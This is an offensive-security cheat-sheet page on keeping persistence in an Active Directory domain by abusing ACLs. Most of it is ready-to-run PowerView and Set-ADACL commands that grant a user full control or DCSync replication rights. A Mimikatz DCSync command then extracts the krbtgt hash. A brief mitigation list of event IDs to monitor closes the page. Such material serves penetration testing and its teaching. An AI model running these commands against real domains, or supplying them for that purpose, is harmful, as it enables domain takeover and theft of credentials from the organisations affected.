Abusing ACLs
With the privileges of a Domain Admin, we can change the ACL rights for any user we wish to maintain persistence in a network.
Depending on the rights you change and on whom you change them, this can be a stealthy technique provided that no code gets executed on the Domain Controller. One such method is to give a user replication rights to then execute DCSync with and extract the krbtgt hash.
Useful Commands From Powershell
Give a User Full Control Rights over the Domain Object Itself
I should note this technique could be easily spotted...
# PowerView
Add-ObjectAcl -TargetDistinguishedName 'DC=domain,DC=local' -PrincipalSamAccountName <user> -Rights All -Verbose
# AD Module with Set-ADACL.ps1
Set-ADACL -DistinguishedName 'DC=domain,DC=local' -Principal <user> -Verbose
Give a User Replication Rights
A much quieter technique than the above. It requires 3 rights to be given:
Replicating Directory Changes
Replicating Directory Changes All
Replicating Directory Changes in Filtered Set

# PowerView
Add-ObjectAcl -TargetDistinguishedName 'DC=domain,DC=local' -PrincipalSamAccountName <user> -Rights DCSync -Verbose
# AD Module with Set-ADACL.ps1
Set-ADACL -DistinguishedName 'DC=domain,DC=local' -Principal <user> -GUIDRight DCSync -Verbose
You Can Then Run DCSync on Any User You Want Afterwards
Invoke-Mimikatz -Command '"lsadump::dcsync /user:<domain>\krbtgt"'
Mitigations
Monitor Secutiry events:
4662 - Operations on objects
5136 - Modification of Objects
4670 - Changed Object Permissions
Last updated